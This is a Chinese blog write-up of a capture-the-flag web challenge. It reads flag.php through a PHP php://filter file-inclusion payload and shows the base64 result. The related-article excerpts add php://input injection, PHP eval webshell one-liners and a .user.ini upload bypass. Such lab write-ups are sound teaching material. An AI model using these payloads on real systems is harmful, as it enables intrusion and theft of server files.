[ACTF2020 新生赛]Include

最新推荐文章于 2025-05-14 22:06:07 发布
最新推荐文章于 2025-05-14 22:06:07 发布
阅读量118 收藏
点赞数
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44022113/article/details/114299453
版权

不截图了,进入靶机只有一个tips等着被点。跳转以后看url中参数

?file=flag.php

页面内容只有

Can you find out the flag?

立马想到使用php伪协议读文件内容。使用filter过滤器

?file=php://filter/convert.base64-encode/resource=flag.php

得到

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7OTAyNTIyNDgtMjY3NC00NDdjLWFlYWMtYjc3ZTc5YjYwMzVmfQo=

解密得到flag

[ACTF2020 新生]Include1
weixin_64160292的博客
03-31 5738
题目:[ACTF2020 新生]Include1 题目来源:buuctf 过程分析: 1、首先看到一个tips,我们打开看看 然后从题目我们知道这个是一个文件包含题,对文件进行php伪协议检测 伪协议 php://input:用来接收POST数据。我们能够通过input把我们的语句输入上去然后执行。 条件: php <5.0 ,allow_url_include=Off 情况下也可以用 php > 5.0,只有在allow_url_fope
[ACTF2020 新生]Include 1
qq_51553814的博客
08-01 1599
[ACTF2020 新生]Include 1 首先看题目信息有个关键字include,我们就应该能猜到这题的主要考点是文件包含 进入靶场 一进去,就让我们点击,那么我们就点击瞅瞅吧 果然不出所料,url上面显眼的‘file=’就是我们想要的文件包含漏洞 以开始以为flag在其他漏洞,我先用file=php//input,再Post传参 但是当url后面接上file=php://input时,就直接给我返回了hacker页面,看来服务器是对input过滤了 那么就换一个方式,先用file=php:/
[ACTF2020 新生]Include1 wp
最新发布
wings_S3的博客
05-14 768
拿到题目没有什么提示,打开环境,只有一个超链接。点击超链接,看一下有没有什么信息,得到下面语句包括超链接里面的源代码也没什么有用的信息,回归原页面,看一下源代码里面有没有什么有用信息。注意网址,网址出现变化,URL后面有以get的形式进行访问的文件fla.php。开始尝试更改file的内容,比如index.php等好吧,啥都没有,更改思路,看题目内容include,文件包含,可以使用伪协仪。最常用的是(用于读取源码)是 PHP 的一个特殊协议,用于对数据流进行过滤或处理。
[ACTF2020 新生]Include1详细解题思路
2402_87387389的博客
09-29 1714
⭐️PHP伪协议详解-优快云博客1.伪协议成功执行需要一些条件在满足条件的情况下根据相应的类型,所对应的方法进行查看2.
【BUUCTF】ACTF2020 新生Include1 write up
GZWZ_的博客
03-30 3279
鉴于前几篇wp写的有些过于小白,我以后会改的┭┮﹏┭┮(web本就逆天,死在路上很正常)!
buuctf [ACTF2020 新生]Include
shdbehdvd的博客
09-26 775
文件上传漏洞。
【BUUCTF】[ACTF2020 新生]Include1
weixin_61970418的博客
12-09 714
我们利用php伪协议中的php://filter进行读取flag.php并进行base64编码输出,否则会被当做php代码执行,而被隐藏,完整代码为。会输出一段base64编码,任意选择方式进行解码即可,我刚好开着burp,用burp中的解码器进行解码,就得到了flag。出现了一句话,Can you find the flag?,url也出现了变化,出现了?右键页面源代码,并没有出现flag。打开靶机,只有一个超链,点击。
自用2024.11.26——[ACTF2020 新生]Include 1
2402_87387800的博客
12-04 1475
是一种元封装器,设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似readfile()、file()和file_get_contents(),在数据流内容读取之前没有机会应用其他过滤器。简单来说:这是一个中间件,在读入或写入数据的时候对数据进行处理后输出的一个过程。可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。从而导致任意文件读取。协议参数名称描述resource=这个参数是必须的。
BUUCTF[ACTF2020 新生]Include 1
qq_44761422的博客
08-28 428
F12看源代码php伪协议。
actf2020新生include1
12-28
### ACTF2020 新生 Include1 题目解析 #### 背景介绍 ACTF2020新生中的`Include1`题目属于Web安全领域,主要考察参者对文件包含漏洞的理解和利用能力。该题旨在测试选手能否通过特定手段绕过服务器端的安全...
[ACTF2020 新生]Include 1【文件包含漏洞】
weixin_38832257的博客
08-17 4714
题目简介 题目名称:[ACTF2020 新生]Include 1 题目平台:BUUCTF 题目类型:Web 考察知识点: 文件包含漏洞 解题步骤 1.启动并访问靶机,主页只有一个tips连接,我们访问该链接,发现通过file伪协议,打开了flag.php这个文件,说明存在文件包含漏洞。2.既然该文件名为flag.php,那么flag应该就存在于此文件中,但是我们f12并没有查看到flag,猜测flag应该是在flag.php的源代码当中3.我们可以利用php://filter伪协议来查看flag
[ACTF2020 新生]Include (文件包含漏洞)_include ctf
m0_61549740的博客
04-06 913
构造payload:​​​​​​​?就可以得到base64编码后的flag.php:利用进行解码:得到flag.php的内容:即可得到flag。
BUUCTF寒假刷题-Web
热门推荐
Braindance
02-28 7万+
寒假横向刷题(尽量) BUUCTF 2021.01.15 [HCTF 2018]WarmUp 进到靶机一个硕大的滑稽,查看源码有提示source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","h.
[极客大挑战 2019]Upload
Braindance
03-04 508
先尝试上传一个gif图片马内容为 GIF89a <?php @eval($_POST['a']); 页面提示过滤: NO! HACKER! your file included ‘<?’ 尝试script执行php代码 <script language="php">eval($_POST['cmd'])</script> 可以上传,文件在/upload目录下。尝试修改后缀上传,phtml上传成功,可以执行php和script代码,使用蚁剑连接。 ...
[SUCTF 2019]CheckIn
Braindance
03-06 450
知识点 .user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。可谓很广,不像.htaccess有局限性,只能是apache. 准备好.user.ini文件内容为自动包含图片马,因为上传会检查文件头,所以添加了一个GIF文件头伪装: GIF89a auto_prepend_file=233.gif 接下来上传图片马,尝试了正常上传的一句话会提示: <? in contents! 所以使用script马执.
[HCTF 2018]admin
Braindance
03-06 353
可以在注释里找到 <!-- you are not admin --> 思路应该是只要我们是admin登陆就可以得到flag,可以找到注册按钮,不能注册admin,那就随便注册一个进去看看。找到几个功能。 post。发表文章,但是没能找到在哪里打开 change password。改密码,尝试下能不能抓包改到admin的密码 修改密码抓到的包: 感觉并没有什么下手的地方,唯一的就是session可能和身份有关。 以下的是看网上的wp 在change password页面查看源码,发现.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值